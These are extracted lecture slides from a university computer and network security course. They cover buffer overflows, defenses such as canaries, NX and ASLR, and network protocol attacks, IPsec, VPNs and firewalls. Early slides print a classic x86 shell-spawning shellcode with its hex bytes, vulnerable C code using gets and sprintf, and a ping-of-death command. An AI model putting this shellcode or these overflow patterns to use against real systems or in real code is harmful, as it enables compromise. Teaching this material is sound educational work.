$ cc -g -o buffer1 buffer1.c
$ ./buffer1
START
buffer1: str1(START), str2(START), valid(1)
$ ./buffer1
EVILINPUTVALUE
buffer1: str1(TVALUE),
str2(EVILINPUTVALUE), valid(0)
$ ./buffer1
BADINPUTBADINPUT
buffer1: str1(BADINPUT),
str2(BADINPUTBADINPUT), valid(1)

CIS 433/533: Computer and Network Security

Memory
Address
. . . .

Before
gets(str2)
. . . .

bffffbf4 34fcffbf
4 . . .
bffffbf0 01000000
. . . .
bffffbec c6bd0340
. . . @
bffffbe8 08fcffbf
. . . .
bffffbe4 00000000
. . . .
bffffbe0 80640140
. d . @
bffffbdc 54001540
T . . @
bffffbd8 53544152
S T A R
bffffbd4 00850408
. . . .
bffffbd0 30561540
0 V . @
. . . .

. . . .

After
gets(str2)

Contains
Value of

. . . .
34fcffbf
3 . . .
01000000
. . . .
c6bd0340
. . . @
08fcffbf
. . . .
01000000
. . . .
00640140
. d . @
4e505554
N P U T
42414449
B A D I
4e505554
N P U T
42414449
B A D I
. . . .

argv
argc
return
addr
old base
ptr
valid

str1[4-7]
str1[0-3]
str2[4-7]
str2[0-3]

Buffer Overflow Attacks
• to exploit a buffer overflow an attacker:
‣ must identify a buffer overflow vulnerability in some

program
• inspection, tracing execution, fuzzing tools

‣ understand how buffer is stored in memory and

determine potential for corruption

CIS 433/533: Computer and Network Security

Programming Language History
• at machine level all data an array of bytes
‣ interpretation depends on instructions used
• modern high-level languages (e.g., Java, Python) have a strong

notion of type and valid operations
‣ not vulnerable to buffer overflows
‣ does incur overhead, some limits on use


C and related languages have high-level control structures, but
allow direct access to memory

• Best of both worlds?
‣ vulnerable to buffer overflow
‣ have a large legacy of widely used, unsafe, and hence

vulnerable code
CIS 433/533: Computer and Network Security

Function Calls & Stack Frames

CIS 433/533: Computer and Network Security

Stack Buffer Overflow
• occurs when buffer is located on stack
‣ used by Morris Worm (used unsafe gets in fingerd)
‣ Aleph One paper popularized it

• have local variables below saved frame pointer and

return address
‣ hence overflow of a local buffer can potentially overwrite

these key control items

• attacker overwrites return address with address of

desired code
‣ program, system library or loaded in buffer
CIS 433/533: Computer and Network Security

Programs and Processes

CIS 433/533: Computer and Network Security

In Practice
• How it works

Previous Function

Stack
Frame

Func Parameters
Return Address
Local Var
Buffer

New
Rtn
Evil Code
Evil Code
Evil Code
Evil Code

Local Var
CIS 433/533: Computer and Network Security

11

Another Stack Overflow
void getinp(char *inp, int siz)
{
puts("Input value: ");
fgets(inp, siz, stdin);
printf("buffer3 getinp read %s\n", inp);
}
void display(char *val)
{
char tmp[16];
sprintf(tmp, "read val: %s\n", val);
puts(tmp);
}
int main(int argc, char *argv[])
{
char buf[16];
getinp(buf, sizeof(buf));
display(buf);
printf("buffer3 done\n");
}

What’s wrong with this code?
CIS 433/533: Computer and Network Security

Another Stack Overflow
$ cc -o buffer3 buffer3.c
$ ./buffer3
Input value:
SAFE
buffer3 getinp read SAFE
read val: SAFE
buffer3 done
$ ./buffer3
Input value:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
buffer3 getinp read XXXXXXXXXXXXXXX
read val: XXXXXXXXXXXXXXX
buffer3 done
Segmentation fault (core dumped)

CIS 433/533: Computer and Network Security

Shellcode
• code supplied by attacker
‣ often saved in buffer being overflowed
‣ traditionally transferred control to a shell

• machine code
‣ specific to processor and operating

system
‣ traditionally needed good assembly

language skills to create
‣ more recently have automated sites/tools

CIS 433/533: Computer and Network Security

Shellcode Development
• illustrate with classic Intel Linux shellcode to run

Bourne shell interpreter
• shellcode must
‣ marshall argument for execve() and call it
‣ include all code to invoke system function
‣ be position-independent
‣ not contain NULLs (C string terminator)

CIS 433/533: Computer and Network Security

Example Shellcode
Assembled x86 code

NOP sled
cont:

find:
sh:
args:

nop
nop
jmp
find
pop
%esi
xor
%eax,%eax
mov
%al,0x7(%esi)
lea
(%esi),%ebx
mov
%ebx,0x8(%esi)
mov
%eax,0xc(%esi)
mov
$0xb,%al
mov
%esi,%ebx
lea
0x8(%esi),%ecx
lea
0xc(%esi),%edx
int
$0x80
call
cont
.string "/bin/sh "
.long 0
.long 0

//
//
//
//
//
//
//
//
//
//
//
//
//
//
//
//
//

end of nop sled
jump to end of code
pop address of sh off stack into %esi
zero contents of EAX
copy zero byte to end of string sh (%esi)
load address of sh (%esi) into %ebx
save address of sh in args[0] (%esi+8)
copy zero to args[1] (%esi+c)
copy execve syscall number (11) to AL
copy address of sh (%esi) t0 %ebx
copy address of args (%esi+8) to %ecx
copy address of args[1] (%esi+c) to %edx
software interrupt to execute syscall
call cont which saves next address on stack
string constant
space used for args array
args[1] and also NULL for env array

90 90 eb 1a 5e 31 c0 88 46 07 8d 1e 89 5e 08 89
46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 e8 e1
ff ff ff 2f 62 69 6e 2f 73 68 20 20 20 20 20 20

Machine code (alphanumeric representation)
CIS 433/533: Computer and Network Security

Stack Overflow Variants
• target program can be:
‣ a trusted system utility
‣ network service daemon
‣ commonly used library code, e.g. image

• shellcode functions
‣ spawn shell
‣ create listener to launch shell on connect
‣ create reverse connection to attacker
‣ flush firewall rules
‣ break out of choot environment
CIS 433/533: Computer and Network Security

Buffer Overflow Defenses
• buffer overflows are widely exploited
• large amount of vulnerable code in use
‣ despite cause and countermeasures known

• two broad defense approaches
‣ compile-time - harden new programs
‣ run-time - handle attacks on existing programs

CIS 433/533: Computer and Network Security

Compile-Time Defenses
• use a modern high-level languages with strong

typing
‣ not vulnerable to buffer overflow
‣ compiler enforces range checks and permissible

operations on variables

• do have cost in resource use
• and restrictions on access to hardware
‣ so still need some code in C-like languages

CIS 433/533: Computer and Network Security

Compile-Time Defenses
• proposals for safety extensions to C

(e.g., CCured, Cyclone)
‣ performance penalties
‣ must compile programs with special compiler

• have several safer standard library variants
‣ new functions, e.g. strlcpy()
‣ safer re-implementation of standard functions as a

dynamic library, e.g. Libsafe

CIS 433/533: Computer and Network Security

Stack Protection
• StackGuard
‣ Push a ‘canary’ on the stack between the

local vars and the return pointer
‣ Overwrite of canary indicates a buffer

overflow
‣ Requires changes to the compiler

• Q: Would this solve the problem?
• Thorough summary:
‣ www.blackhat.com/presentations/bh-

usa-04/bh-us-04-silberman/bh-us-04silberman-paper.pdf
CIS 433/533: Computer and Network Security

21

Non-Executable Address Space
• Runtime defense
• use virtual memory support to make some

regions of memory non-executable
‣ e.g. stack, heap, global data
‣ need h/w support in MMU
‣ long existed on SPARC / Solaris systems
‣ recent on x86 Linux/Unix/Windows systems
• no-execute bit in MMU

• issues: support for executable stack code
‣ need special provisions
CIS 433/533: Computer and Network Security

Address Space Randomization
• manipulate location of key data structures
‣ stack, heap, global data
‣ using random shift for each process
‣ have large address range on modern systems means

wasting some has negligible impact

• also randomize location of heap buffers
• and location of standard library functions
• Solves all of our problems?

CIS 433/533: Computer and Network Security

Guard Pages
• place guard pages between critical regions of

memory
‣ flagged in MMU as illegal addresses
‣ any access aborts process

• can even place between stack frames and heap

buffers
‣ at execution time and space cost

CIS 433/533: Computer and Network Security

Other Overflow Attacks
• Wide range of other attack variants
‣ stack overflow variants
‣ heap overflow
‣ global data overflow
‣ format string overflow
‣ integer overflow

• more likely to be discovered in future
• some cannot be prevented except by coding to

prevent originally
CIS 433/533: Computer and Network Security

Replacement Stack Frame
• stack overflow variant just rewrites buffer and

saved frame pointer
‣ so return occurs but to dummy frame
‣ return of calling function controlled by attacker
‣ used when have limited buffer overflow
‣ e.g. off by one

• limitations
‣ must know exact address of buffer
‣ calling function executes with dummy frame
CIS 433/533: Computer and Network Security

Return to libc
• stack overflow variant replaces return address with

standard library function
‣ response to non-executable stack defences
‣ attacker constructs suitable parameters on stack above

return address
‣ function returns and library function executes
• e.g. system(“shell commands”)

‣ attacker may need exact buffer address
‣ can even chain two library calls

• Return-oriented rootkits (Shacham et al., UCSD)
CIS 433/533: Computer and Network Security

Heap Overflow
• also attack buffer located in heap
‣ typically located above program code
‣ memory requested by programs to use in dynamic data

structures, e.g. linked lists

• no return address
‣ hence no easy transfer of control
‣ may have function pointers can exploit
‣ or manipulate management data structures

• defenses: non executable or random heap
CIS 433/533: Computer and Network Security

Java World
• Type Safe Language
‣ No buffer/heap/ptr overflows
‣ No unsafe casts
‣ Still have integer overflows?

• Java Virtual Machine
‣ Interpret bytecode (or compile together)
‣ Security Manager (reference monitor for

JVM)

• Q: What is the trust model of a Java

application?
CIS 433/533: Computer and Network Security

29

Ccured
• From C to Memory-safe C Translator
‣ Find the minimum number of runtime checks to ensure

memory safety

• Classify Pointers
‣ Safe
‣ Wild
• Need runtime checks for wild pointers

• Runtime Checks
‣ Similar to declassifiers in DLM
‣ Written by hand, in general
CIS 433/533: Computer and Network Security

30

C Analysis
• Assume Type Safety in Analysis
‣ On what basis?
‣ Trust that the programmer does not subvert

• Is this a reasonable assumption?
‣ Unsound analysis
• False negatives are possible
‣ Sound analysis
• If no unsafe behavior relative to analysis can be assumed
• False positives are possible

• Actually, lots of work in this area
• Used in production code: Microsoft
CIS 433/533: Computer and Network Security

31

Source Code Analysis
• Shallow tools for bug finding
‣ Prefix, Prefast -- Microsoft

• Companies that will check your code
‣ Coverity -- based on MC

• Deep tools for verifying correctness
‣ SLAM -- for device drivers

• Add security to legacy code
‣ Generate LSM
‣ Generate reference monitor for X Server

• Lots of other topics
‣ Privilege separation, domain transition, error reporting
CIS 433/533: Computer and Network Security

32

Driver Verification
void LeakSample(BOOLEAN Option1)
{
NTSTATUS Status;
KIRQL OldIrql;
BufInfo *pBufInfo;
KeAcquireSpinLock(MyLock,&OldIrql);
//...
if (Option1) {
pBufInfo = ExAllocatePoolWithTag(NonPagedPool,
sizeof(BufInfo), 'fuB_');
if (NULL==pBufInfo) {
return STATUS_NO_MEMORY;
}
//...
KeReleaseSpinLock(MyLock, OldIrql);
return STATUS_SUCCESS;
}
//...

PREfast catches this

• Memory leak of spin lock resource
CIS 433/533: Computer and Network Security

33

Driver Verification
void LeakSample(BOOLEAN Option1)
{
NTSTATUS Status;
KIRQL OldIrql;
BufInfo *pBufInfo;
KeAcquireSpinLock(MyLock,&OldIrql);
//...
if (Option1) {
pBufInfo = ExAllocatePoolWithTag(NonPagedPool,
sizeof(BufInfo), 'fuB_');
if (NULL==pBufInfo) {
KeReleaseSpinLock(MyLock, OldIrql);
return STATUS_NO_MEMORY;
}
//...
KeReleaseSpinLock(MyLock, OldIrql);
return STATUS_SUCCESS;
}
//...

• Make sure lock is released (match Acquires with Releases)
CIS 433/533: Computer and Network Security

34

Security Typed Languages
• Key:
‣ tag data & monitor flows
‣ e.g., language: Jif

• RMs tag actual data
‣ all data/processes have label
‣ central security monitor checks op-

Label all data

erations, data access against policy

• Security-typed languages use

virtual tags
‣ data types are labeled
‣ type checker validates flows
CIS 433/533: Computer and Network Security

Monitor flows
35

Build on type safety
• A type-safe

Example 1

language maintains Object obj;
int i;
the semantics of
obj = obj + i;
types. E.g. can’t
add int’s to
Example 2
Object’s.
String proc_obj(Object

X

• Type-safety is

compositional. A
function promises
to maintain type
safety.
CIS 433/533: Computer and Network Security

o);

...
main()
{
Object obj;
String s = proc_obj(obj);
...
}
36

Labeling types
Example 1
int{high} h1,h2;
int{low} l;
l = 5;
h2 = l;
h1 = h2 + 10;
l = h2 + l;

X

• Key insight:

label types with
security levels

Example 2
String{low}
proc_obj(Object{high} o);
...
main()
{
Object{high} obj;
String{low} s;
s = proc_obj(obj);
...
}

• Security-typing is

compositional
CIS 433/533: Computer and Network Security

37

Explicit Flow Prevention
public class SecretMessages[principal alice, principal bob]
{

String{alice:} aliceInstructions;

String{bob:} bobInstructions;


public SecretMessages(String{alice:} ai, String{bob:} bi) {


aliceInstructions = ai;


bobInstructions = bi;

}

...




}

public String{bob:} leak() {

bobInstructions = aliceInstructions;

return bobInstructions;
}

CIS 433/533: Computer and Network Security

38

Implicit Flow Prevention
public class SecretMessages[label alice, label bob]
{

String{*alice} aliceInstructions;

String{*bob} bobInstructions;


public SecretMessages(String{*alice} ai, String{*bob} bi) {


aliceInstructions = ai;


bobInstructions = bi;

}
...

public String{*bob} implicitLeak() {


try {



if (aliceInstructions.equals("Attack at dawn"))




bobInstructions = "Attack at dawn";


} catch (NullPointerException e) {}


return bobInstructions;

}
}
CIS 433/533: Computer and Network Security

39

Declassification
• MLS is too restrictive
• Examples:
‣ Encryption
‣ Distributed auction
‣ Password check

• Solutions:
‣ Declassification
• Reduce the level of data -- tolerable leakage

CIS 433/533: Computer and Network Security

40

CSE443 - Introduction to
Computer and Network
Security
Network Security
Professor Kevin Butler
Winter 2011
Computer and Information Science

Networking
• Fundamentally about transmitting information

between two devices
• Direct communication is now possible between any

two devices anywhere (just about)
‣ Lots of abstraction involved
‣ Lots of network components
‣ Standard protocols
‣ Wired and wireless
‣ Works in protection environment

• What about ensuring security?
CIS 433/533: Computer and Network Security

2

Network Security
• Every machine is connected
‣ What is trust model of the network?

• Not just limited to dogs as users
CIS 433/533: Computer and Network Security

3

Exploiting the network ...
• The Internet is extremely vulnerable to attack
‣ it is a huge open system ...
‣ which adheres to the end-to-end principle
• smart end-points, dumb network

‣ Can you think of any large-scale attacks that would be

enabled by this setup?
CIS 433/533: Computer and Network Security

4

E2E Argument
• Clark et al. discussed a property of good systems that

says features should be placed as close to resources as
possible
‣ In communication, this means that we want the middle

of the network to be simple, and the end-points to be
smart (e.g., do everything you can at the end-points)
• “Dumb, minimal network”
‣ This is the guiding principle of IP (Internet)
‣ Q: Does this have an effect on security?
• Note: this is a departure from the early networks which

smart network, dumb terminals
CIS 433/533: Computer and Network Security

5

Network security: the high bits
• The network is …
‣ … a collection of interconnected computers
‣ … with resources that must be protected
‣ … from unwanted inspection or modification
‣ … while maintaining adequate quality of service.

• Another way of seeing network security is
‣ Securing the network infrastructure such that the integrity,

confidentiality, and availability of the resources is
maintained.

• Q: How do we do this?
CIS 433/533: Computer and Network Security

6

The network …
(perimeter)

(edge)

Internet
LAN

(remote hosts/
servers) (hosts/desktops)
CIS 433/533: Computer and Network Security

(server)
7

The big picture ….
• Internet Protocol (IP)
‣ Really refers to a whole collection of protocols
making up the vast majority of the Internet
• Routing
‣ How these packets move from place to place

• Network management
‣ Administrators have to maintain the services and

infrastructure supporting everyone’s daily activities

CIS 433/533: Computer and Network Security

8

Aside: Malware
• Malware - software that exhibits malicious behavior

(typically manifest on user system)
‣ virus - self-replicating code, typically transferring by shared

media, filesystems, email, etc.
‣ worm - self propagating program that travels over the
network

• The behaviors are as wide ranging as imagination
‣ backdoor - hidden entry point into system that allows quick

access to elevated privileges
‣ rootkit - system replacement that hides adversary behavior
‣ key logger - program that monitors, records, and potentially
transmits keyboard input to adversary
‣ trojan - malicious software disguised as legitimate program
CIS 433/533: Computer and Network Security

9

Security Problems in the TCP/IP Protocol Suite
• Bellovin’s observations about security problems in IP
‣ Not really a study of how IP is misused, e.g., IP addresses

for authentication, but really what is inherently bad about the
way in which IP is setup

• A good overview of the basic ways in which security

and the IP design is at odds
CIS 433/533: Computer and Network Security

10

Sequence number prediction
• TCP/IP uses a three-way handshake to establish

a connection
1. C -> S: QC
2. S -> C: QS, ack(QC) where sequence number QS is
nonce
3. C -> S: ack(QS) … then send data
2. However assume the bad guy does not hear msg 2, if he can
guess QS, then he can get S to accept whatever data it
wants (useful if doing IP authentication, e.g., “rsh”)

Client

Server
Adversary

CIS 433/533: Computer and Network Security

11

Sequence Number Prediction (fixes)
• The only way you really fix this problem to stop

making the sequence numbers predictable:
‣ Randomize them -- you can use DES or some other

mechanism to generate them randomly
‣ There is an entire sub-field devoted to the creation and

management of randomness in OSes

• Also, you could look for inconsistencies in timing

information
‣ Assumption: the adversary has different timing than client
‣ Helpful, but far from definitive
CIS 433/533: Computer and Network Security

12

Routing Manipulation
• RIP - routing information protocol
‣ Distance vector routing protocol used for local network
‣ Routers exchange reachability and “distance” vectors for all the

sub-networks within (a typically small) domain
‣ Use vectors to decide which is best, notification of changes is

propagated quickly

• So, the big problem is that you receive vast amounts of

data that a router uses to form the routing table
‣ So, just forge that, and the game is up
‣ Manipulate paths, DOS, hijack connections, etc.

• Solutions:
‣ Authenticate data, but this is less than obvious how to do this

efficiently (a whole lot of people are trying)
CIS 433/533: Computer and Network Security

13

Internet Control Message Protocol (ICMP)
• ICMP is used as a control plane for IP messages
‣ Ping (connectivity probe)
‣ Destination Unreachable (error notification)
‣ Time-to-live exceeded (error notification)

• These are used for good purposes, and are largely

indispensable tools for network management and control
‣ Error notification codes can be used to reset connections

without any

• Solution: verify/sanity check sources and content
‣ ICMP “returned packets”

• Real solution: filter most of ICMP, ignore it
CIS 433/533: Computer and Network Security

14

The “ping of death” …
• In 1996, someone discovered that many operating

systems, routers, etc. could be crash/rebooted by
sending a single malformed packet
‣ It turns out that you can send a IP packet larger than 65,535

(216), it would crash the system
‣ The real reason lies in the way fragmentation works
• It allows somebody to send a packet bigger than IP allows
• Which blows up most fixed buffer size implementations
• … and dumps core, blue screen of death, etc.

‣ Note: this is not really ICMP specific, but easy (try it)

! % ping -l 65510 your.host.ip.address

• This was a popular pastime of early hackers
‣ Solution: patch the implementations
CIS 433/533: Computer and Network Security

15

Address Resolution Protocol (ARP)
• Protocol used to map IP address onto the physical

layer addresses (MAC)
1) ARP request: who has x.x.x.x?
2) ARP response: me!

• Policy: last one in wins
• Used to forward packets on the appropriate

interfaces by network devices (e.g., bridges)

• Q: Why would you want to spoof an IP address?
CIS 433/533: Computer and Network Security

16

ARP poisoning
• Attack: replace good entries with your own
• Leads to
‣ Session hijacking
‣ Man-in-the-middle attacks
‣ Denial of service, etc.

• Lots of other ways to abuse ARP.
• Nobody has really come up with a good solution
‣ Except smart bridges, routers that keep track of MACs

• However, some not worried
‣ If adversary is in your perimeter, you are in big trouble
‣ You should validate the source of each packet independently (e.g.,

via IPsec)
CIS 433/533: Computer and Network Security

17

Legacy flawed protocols/services
• Finger user identity
‣ host gives up who is logged in, existence of identities
butler@ix: ~ 7$ finger butler
Login name: butler
In real life: Kevin Butler
Directory: /home/faculty/butler
Shell: /bin/zsh
On since Feb 20 18:29:46 on pts/22 from wheatking
Mail last read Sun Feb 20 18:02:11 2011
Plan:
World domination.

• This is horrible in a distributed environment
‣ Privacy, privacy, privacy… (assuming any of you

Facebook users still care about this)
‣ Lots of information to start a compromise of the user
CIS 433/533: Computer and Network Security

18

POP/SMTP/FTP
• Post office protocol - mail retrieval
‣ Passwords passed in the clear (duh)
‣ Solution: SSL, SSH, Kerberos

• Simple mail transport protocol (SMTP) - email
‣ Nothing authenticated: SPAM
‣ Nothing hidden: eavesdropping
‣ Solution: your guess is as good as mine

• File Transfer protocol - file retrieval
‣ Passwords passed in the clear (duh)
‣ Solution: SSL, SSH, Kerberos
CIS 433/533: Computer and Network Security

19

DNS - The domain name system
• DNS maps between IP address (12.1.1.3) and

domain and host names (ix.cs.uoregon.edu)
‣ How it works: the “root” servers redirect you to the top

level domains (TLD) DNS servers, which redirect you to
the appropriate sub-domain, and recursively ….
‣ Note: there are 13 “root” servers that contain the TLDs
for .org, .edu, and country specific registries (.fr, .ch)

root

.edu

ix.cs.uoregon.edu?
CIS 433/533: Computer and Network Security

uoregon.edu

Host (resolver)

cs.uoregon.edu

128.223.4.21
20

DNS Vulnerabilities
• Nothing is authenticated, so really the game is over
‣ You can not really trust what you hear …
‣ But, many applications are doing just that.
‣ Spoofing of DNS is really dangerous

• Moreover, DNS is a catalog of resources
‣ Zone-transfers allow bulk acquisition of DNS data
‣ … and hence provide a map for attacking the network

• Lots of opportunity to abuse the system
‣ Relies heavily on caching for efficiency -- cache pollution
‣ Once something is wrong, it can remain that way in caches

for a long time (e.g., it takes a long time flush)
‣ Data may be corrupted before it gets to authoritative server
CIS 433/533: Computer and Network Security

21

DNSSEC
• A standard-based (IETF) solution to security in

DNS
‣ Prevents data spoofing and corruption
‣ Public key based solution to verifying DNS data
‣ Authenticates
• Communication between servers
• DNS data
• Public keys (a bootstrap for PKI?)

• New as of last year:
‣ DNSSEC signed root zone up
CIS 433/533: Computer and Network Security

22

DNSsec Mechanisms
• TSIG : transaction signatures protect DNS

operations
‣ Zone loads, some server to server requests (master ->

slave), etc.
‣ Time-stamped signed responses for dynamic requests
‣ A misnomer -- it currently uses shared secrets for TSIG

(HMAC) or do real signatures using public key
cryptography

• SIG0: a public key equivalent of TSIG
‣ Works similarly, but with public keys
‣ Not as popular as TSIG, being evaluated
‣ Note: these mechanisms assume clock sync. (NTP)
CIS 433/533: Computer and Network Security

23

DNSsec Mechanisms
• Securing the DNS records
‣ Each domain signs their “zone” with a private key
‣ Public keys published via DNS
‣ Indirectly signed by parent zones
‣ Ideally, you only need a self-signed root, and follow keys

down the hierarchy

Signs
root

Signs
.edu

CIS 433/533: Computer and Network Security

Signs
uoregon.edu

cs.uoregon.
edu

24

DNSsec challenges
• Incremental deployability
‣ Everyone has DNS, can’t assume a flag day

• Resource imbalances
‣ Some devices can’t afford real authentication

• Cultural
‣ Most people don’t have any strong reason to have secure

DNS ($$$ not justified in most environments)
‣ Lots of transitive trust assumptions (you have no idea

how the middlemen do business)

• Take away: DNSsec will be deployed, but usage

and uptake is still unclear
CIS 433/533: Computer and Network Security

25

Communications Security
• A host wants to establish a secure channel to remote

hosts over an untrusted network
‣ Not Login – end-users may not even be aware that

protections in place
‣ Remote hosts may be internal or external

• The protection service must …
‣ Authenticate the end-points (each other)
‣ Negotiate what security is necessary (and how)
‣ Establish a secure channel
‣ Process the traffic between the end points

• Also known as transport security.
CIS 433/533: Computer and Network Security

26

IPsec (not IPSec!)
• Host level protection service
‣ IP-layer security (below TCP/UDP)
‣ De-facto standard for host level security
‣ Developed by the IETF (over many years)
‣ Available in most operating systems/devices
• E.g., XP, Vista, OS X, Linux, BSD*, …

‣ Implements a wide range of protocols and cryptographic

algorithms

• Selectively provides ….
‣ Confidentiality, integrity, authenticity, replay protection,

DOS protection
CIS 433/533: Computer and Network Security

27

IPsec and the IP protocol stack
• IPsec puts the two main

protocols in between IP and the
other protocols
‣ AH - authentication header
‣ ESP - encapsulating security

payload

HTTP

FTP

SMTP

TCP

UDP

AH

ESP
IP

• Tunnel vs. transport?
‣ Key management/authentication
‣ Policy

• Other function provided by

external protocols and
architectures
CIS 433/533: Computer and Network Security

28

Tunneling
• “IP over IP”
‣ Network-level packets are encapsulated
‣ Allows traffic to avoid firewalls


IP layer

IP layer
CIS 433/533: Computer and Network Security

29

IPsec Protocol Suite
Policy/
Configuration
Managent
(SPS)
Security Policy
System

CIS 433/533: Computer and Network Security

Key
Management

Packet
Processing

Manual

(ESP)
Encapsulating
Security Payload

(IKE)
Internet Key
Exchange

(AH)
Authentication
Header
30

Internet Key Exchange (IKE)
• Built on of ISAKMP framework
• Two phase protocol used to establish parameters

and keys for session
‣ Phase 1: authenticate peers, establish secure channel
‣ Phase 2: negotiate parameters, establish a security

association (SA)

• The details are unimaginably complex
• The SA defines algorithms, keys, and policy used to

secure the session

CIS 433/533: Computer and Network Security

31

IPsec: Packet Handling (Bump …)
IP Protocol Stack

Application
Presentation
Session
Transport

SADB
IPsec

Network (IP)
Data Link
Physical

CIS 433/533: Computer and Network Security

32

Authentication Header (AH)
• Authenticity and integrity
‣ via HMAC
‣ over IP headers and data

• Advantage: the authenticity of data and IP header

information is protected
‣ it gets a little complicated with mutable fields, which are supposed

to be altered by network as packet traverses the network
‣ some fields are immutable, and are protected

• Confidentiality of data is not preserved
• Replay protection via AH sequence numbers
‣ note that this replicates some features of TCP (good?)
CIS 433/533: Computer and Network Security

33

IPsec AH Packet Format
IPv4 AH Packet Format
IPv4 Header

Authentication Header

Higher Level
Protocol Data

AH Header Format
Next Header

Length

Reserved

Security Parameter Index
Authentication Data (variable number of 32-bit words)

CIS 433/533: Computer and Network Security

34

Authentication Header (AH)
• Modifications to the packet format
IP Header

IP Header

AH Header
MAC

Payload

Payload

AH Packet
Authenticated
Encrypted

CIS 433/533: Computer and Network Security

35

IPsec Authentication
SPI: (spy) identifies the security association for this
packet


– Type of crypto checksum, how large it is, and how it is computed
– Really the policy for the packet



Authentication data
– Hash of packet contents include IP header as as specified by SPI
– Treat transient fields (TTL, header checksum) as zero



Keyed MD5 Hash is default
MD5 Hash

Secret
Key

Key

CIS 433/533: Computer and Network Security

Headers and data being sent

Key

36

Encapsulating Security Payload (ESP)
• Confidentiality, authenticity and integrity
‣ via encryption and HMAC
‣ over IP payload (data)

• Advantage: the security manipulations are done

solely on user data
‣ TCP packet is fully secured
‣ simplifies processing

• Use “null” encryption to get authenticity/integrity only
• Note that the TCP ports are hidden when encrypted
‣ good: better security, less is known about traffic
‣ bad: impossible for FW to filter/traffic based on port

• Cost: can require many more resources than AH
CIS 433/533: Computer and Network Security

37

IPsec ESP Packet Format
IPv4 ESP Packet Format
IP Header

Unencrypted
Other IP
Headers

Encrypted
ESP Header

Encrypted Data

ESP Header Format
Security Parameter Identifier (SPI)
Opaque Transform Data, variable length

DES + MD5 ESP Format
Security Parameters Index (SPI)
Initialization Vector (optional)
Replay Prevention Field (incrementing count)
Payload Data (with padding)
Authentication checksum

CIS 433/533: Computer and Network Security

38

Encapsulating Security Payload (ESP)
• Modifications to packet format
IP Header

IP Header

ESP Header

Payload

Payload

ESP Trailer

MAC

ESP Packet
Authenticated
Encrypted

CIS 433/533: Computer and Network Security

39

Practical Issues and Limitations
• IPsec implementations
‣ Large footprint
• resource poor devices are in trouble
• New standards to simplify (e.g, JFK, IKE2)
‣ Slow to adopt new technologies

• Issues
‣ IPsec tries to be “everything for everybody at all times”


Massive, complicated, and unwieldy

‣ Policy infrastructure has not emerged
‣ Large-scale management tools are limited (e.g., CISCO)
‣ Often not used securely (common pre-shared keys)
CIS 433/533: Computer and Network Security

40

Network Isolation: VPNs
• Idea: I want to create a collection of hosts that

operate in a coordinated way
‣ E.g., a virtual security perimeter over physical network
‣ Hosts work as if they are isolated from malicious hosts

• Solution: Virtual Private Networks
‣ Create virtual network topology over physical network
‣ Use communications security protocol suites to secure

virtual links “tunneling”
‣ Manage networks as if they are physically separate
‣ Hosts can route traffic to regular networks (split-tunneling)
CIS 433/533: Computer and Network Security

41

VPN Example: RW/Telecommuter
(network edge)

Internet
LAN

Physical Link
Logical Link (IPsec)
CIS 433/533: Computer and Network Security

42

VPN Example: Hub and Spoke
(network edge)

Internet
LAN

Physical Link
Logical Link (IPsec)
CIS 433/533: Computer and Network Security

43

VPN Example: Mesh
(network edge)

Internet
LAN

Physical Link
Logical Link (IPsec)
CIS 433/533: Computer and Network Security

44

Virtual LANs (VLANs)
• VPNs build with hardware
‣ No encryption – none needed
‣ “wire based isolation”
‣ Switches increasingly support VLANs
‣ Allows networks to be reorganized without rewiring

• Example usage: two departments in same hallway
‣ Each office is associated with department
‣ Configuring the network switch gives physical isolation
‣ Note: often used to ensure QoS

CIS 433/533: Computer and Network Security

45

CIS 433/533 - Computer and
Network Security
Firewalls

Professor Kevin Butler
Winter 2011
Computer and Information Science

Firewalls
• A firewall ... is a physical barrier inside a building or

vehicle, designed to limit the spread of fire, heat
and structural collapse.

CIS 433/533: Computer and Network Security

2

Filtering: Firewalls
• Filtering traffic based on policy
‣ Policy determines what is acceptable traffic
‣ Access control over traffic
‣ Accept or deny

• May perform other duties

Application
Network

‣ Logging (forensics, SLA)
‣ Flagging (intrusion detection)
‣ QOS (differentiated services)
CIS 433/533: Computer and Network Security

Link
3

IP Firewall Policy
• Specifies what traffic is (not) allowed
‣ Maps attributes to address and ports
‣ Example: HTTP should be allowed to any external host,

but inbound only to web-server

CIS 433/533: Computer and Network Security

4

X-Listing
• Blacklisting - specifying specific connectivity that is
explicitly disallowed
‣ E.g., prevent connections from badguys.com

• Whitelisting - specifying specific connectivity that
explicitly allowed
‣ E.g., allow connections from goodguys.com

• Useful for IP filtering, spam mitigation, …

CIS 433/533: Computer and Network Security

5

Stateful, Proxy, and Transparent
• Single packet contains insufficient data to make

access control decision
‣ Stateful: allows historical context consideration
‣ Firewall collects data over time
• e.g., TCP packet is part of established session

• Firewalls can affect network traffic
‣ Transparent: appear as a single router (network)
‣ Proxy: receives, interprets, and reinitiates communication

(application)
‣ Transparent good for speed (routers), proxies good for

complex state (applications)
CIS 433/533: Computer and Network Security

6

DMZ (De-militarized Zone)
(servers)

Internet

LAN

• Zone between LAN and Internet (public
CIS 433/533: Computer and Network Security

LAN

facing)
7

Practical Issues and Limitations
• Network layer firewalls are dominant
‣ DMZs allow multi-tiered fire-walling
‣ Tools are widely available and mature
‣ Personal firewalls gaining popularity

• Issues
‣ Network perimeters not quite as clear as before
• E.g., telecommuters, VPNs, wireless, …

‣ Every access point must be protected
• E.g., this is why war-dialing is effective

‣ Hard to debug, maintain consistency and correctness
‣ Often seen by non-security personnel as impediment
• E.g., Just open port X so I can use my wonder widget …
CIS 433/533: Computer and Network Security

8

The Wool firewall study ..
• 12 error classes
‣ No default policy, automatic broad tools
‣ NetBIOS (the very use of the Win protocol deemed error)
‣ Portmapper protocols
‣ Use of “any wildcards”
‣ Lack of egress rules

• Interesting questions:
‣ Is the violation of Wool’s errors really a problem?
‣ “DNS attack” comment?
‣ Why do you think more expensive firewalls had a higher

occurrence of errors?

• Take away: configurations are bad
CIS 433/533: Computer and Network Security

9

Practical Firewall Implementations
• Primary task is to filter packets
‣ But systems and requirements are complex

• Consider
‣ All the protocols and services
‣ Stateless vs. stateful firewalls
‣ Network function: NAT, forwarding, etc.

• Practical implementation: Linux iptables
‣ http://www.netfilter.org/documentation/HOWTO/packet-filtering-

HOWTO.html
‣ http://linux.web.cern.ch/linux/scientific3/docs/rhel-rg-en-3/ch-

iptables.html
CIS 433/533: Computer and Network Security

10

Netfilter hook
• Series of hooks in Linux network protocol stack
